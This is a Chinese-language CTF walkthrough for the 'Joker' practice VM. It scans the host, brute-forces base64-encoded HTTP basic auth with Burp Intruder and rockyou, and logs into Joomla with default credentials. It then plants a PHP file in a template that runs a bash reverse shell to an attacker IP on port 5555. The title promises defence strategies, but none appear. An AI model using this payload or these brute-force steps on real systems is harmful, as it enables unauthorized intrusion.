Jocker靶机全面解析:漏洞挖掘、渗透测试与防御策略
1.开启靶机,确保网络适配器是NAT网段
2.借助kali虚拟机来确定该靶机的IP地址为192.168.139.169
nmap -O 192.168.139.1/24
3.访问该IP地址
4.访问robots.txt,什么也没有
5.扫描目录
dirb http://192.168.139.169
6.访问一下secret.txt
7.访问phpinfo.php
8.访问8080,尝试爆破这个密码
9.打开BP抓包,发现是base64编码
10.在secret.txt发现一些有用信息,要在kali里面进行操作
cd /usr/share/wordlists
ls
gzip -d /usr/share/wordlists/rockyou.txt.gz
cat rockyou.txt
复制字典的前一百个生成一个txt,后面爆破用。
11.打开BP进行抓包,抓8080端口的包
12.发送到Intrder模块进行爆破,开始攻击
爆破出状态码200,然后解码,账号密码为joker:hannah
13.进行登录
14.登陆成功可以发现该网站是由joomla架构,尝试使用默认账号密码joomla
15.点击后台管理系统
16.用户名和密码joomla
17.可以看到这是他网站的一些模板
18.这里可以新建文件
19.新建666.php写入木马,利用菜刀或者蚁剑进行链接
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.139.142/5555 0>&1'");
?>
20.利用kali监听
21.访问http://192.168.139.169:8080/templates/beez3/666.php
回到kali查看是否监听到